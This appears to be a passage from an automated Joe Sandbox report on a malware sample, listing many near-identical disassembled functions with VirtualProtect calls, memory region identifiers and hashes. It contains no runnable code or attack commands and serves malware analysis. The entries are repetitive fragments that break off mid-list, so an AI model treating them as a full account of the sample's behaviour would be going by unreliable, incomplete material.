                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 77f6d390efb2074a9dcccaf55be6bcb51fde9afb9c1353f5910512e37f7c94ac
                                                                                                                                              • Instruction ID: 27de90576a5a983c8bb595c6caf4dd849db3fb230b9d96bcbd17ce429aaee787
                                                                                                                                              • Opcode Fuzzy Hash: 77f6d390efb2074a9dcccaf55be6bcb51fde9afb9c1353f5910512e37f7c94ac
                                                                                                                                              • Instruction Fuzzy Hash: 54C125A2D082649AF7208624DC447EB7A69EF51310F1440FED98D672C1DABE1FC58BA7
                                                                                                                                              Function 00406F96 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 335memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: e670bb2e270d01d68748bfc768d3d097a6a5e55323208fb8fa46f209319c35cb
                                                                                                                                              • Instruction ID: 739206e10e5bbd3a87ea5bf69ee451f3fa2a1961f9d0f60c166b0e27f9f25d40
                                                                                                                                              • Opcode Fuzzy Hash: e670bb2e270d01d68748bfc768d3d097a6a5e55323208fb8fa46f209319c35cb
                                                                                                                                              • Instruction Fuzzy Hash: 72C136A2D082649AF7208624DC44BEB7A68DF51314F1440FED94DA72C1DABE1FC6CB67
                                                                                                                                              Function 00408106 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 334memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 39b22dd4791b86b672102f70ec30b4cce7713b9ba6efc1b3cdc1461827cba0ab
                                                                                                                                              • Instruction ID: 3f89346d8a0091a78b3bd381845a04ed6bfbe6e677ca770093b5f7ced1ed0a00
                                                                                                                                              • Opcode Fuzzy Hash: 39b22dd4791b86b672102f70ec30b4cce7713b9ba6efc1b3cdc1461827cba0ab
                                                                                                                                              • Instruction Fuzzy Hash: 35C135B2C082649AF7208624DC447EB7A68DF51314F1440FED98DA72C1DABE1FC68B67
                                                                                                                                              Function 00406C96 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 334memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: cf541e64226296dde0f04c1dae3208fa3a1819e8189e5f36ca0d2be6f11d627c
                                                                                                                                              • Instruction ID: 2eaf220d0d019d4476795fcdad0f36ee08c7a98f075cd34990ffe1a67c0fd865
                                                                                                                                              • Opcode Fuzzy Hash: cf541e64226296dde0f04c1dae3208fa3a1819e8189e5f36ca0d2be6f11d627c
                                                                                                                                              • Instruction Fuzzy Hash: AAC127A2C082649AF7208624DC447EB7A68DF51314F1440FED94DA72C1DABE1FC6CBA7
                                                                                                                                              Function 00407D7C Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 334memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: c1b652991f57b4d51d9afdfe0ce1b521bfe89a5e91ad65749f707dbb660ceaf2
                                                                                                                                              • Instruction ID: eee95b753abb5236ba68af6bac4d2848ac6c00735159e87780bc59e9a7c006ba
                                                                                                                                              • Opcode Fuzzy Hash: c1b652991f57b4d51d9afdfe0ce1b521bfe89a5e91ad65749f707dbb660ceaf2
                                                                                                                                              • Instruction Fuzzy Hash: D9C134A2D042649AF7208624DC44BEB7A69DF51314F0440FED98D672C1DABE1FC68B67
                                                                                                                                              Function 00406D40 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 329memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 67509ac4e62c815589baa350d5fae777ee73be06b571ee8fc4c68fd4bd71ad68
                                                                                                                                              • Instruction ID: b87fff604113521d0e075d409872acac2f19840f2612352ddb19065799ca5343
                                                                                                                                              • Opcode Fuzzy Hash: 67509ac4e62c815589baa350d5fae777ee73be06b571ee8fc4c68fd4bd71ad68
                                                                                                                                              • Instruction Fuzzy Hash: 9EC137A2C082649AF7208624DC447EB7A69DF51314F1440FED94DA72C1DABE1FC6CB67
                                                                                                                                              Function 00407C5E Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 327memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: a97721c17aed311aaa0913c21342f9e64ea72508fae81aa1c56ff57a7b0cf0b8
                                                                                                                                              • Instruction ID: c319c942094677a70afdbac739dc446af6ba709f5ac1e1e70e693c49bdc09623
                                                                                                                                              • Opcode Fuzzy Hash: a97721c17aed311aaa0913c21342f9e64ea72508fae81aa1c56ff57a7b0cf0b8
                                                                                                                                              • Instruction Fuzzy Hash: CEC124A2D082649AF7208624DC447EB7A69DF51310F1440FED98D672C1DABE0FC6CBA7
                                                                                                                                              Function 00408124 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 326memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: E$L$L$P$Q$W$Windows 95$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                              • API String ID: 544645111-3687113455
                                                                                                                                              • Opcode ID: 5d83786fcbbd1a376f8d13976f562422fa6cf704a8b3cf443a60f46201b176c3
                                                                                                                                              • Instruction ID: 9e595a24c9be7f7410a59fb938de830ddc10ba8880a9535f11e1221573845212
                                                                                                                                              • Opcode Fuzzy Hash: 5d83786fcbbd1a376f8d13976f562422fa6cf704a8b3cf443a60f46201b176c3
                                                                                                                                              • Instruction Fuzzy Hash: E5C136A2C082649AF7208624DC447EB7A68DF51310F1440FED98DA72C1DABE1FC6CB67
                                                                                                                                              Function 0040813A Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 321memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000040,?,004076A1,?,?,?,?,004072BB,?,?,00407209,?,?,004014A7), ref: 00408197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
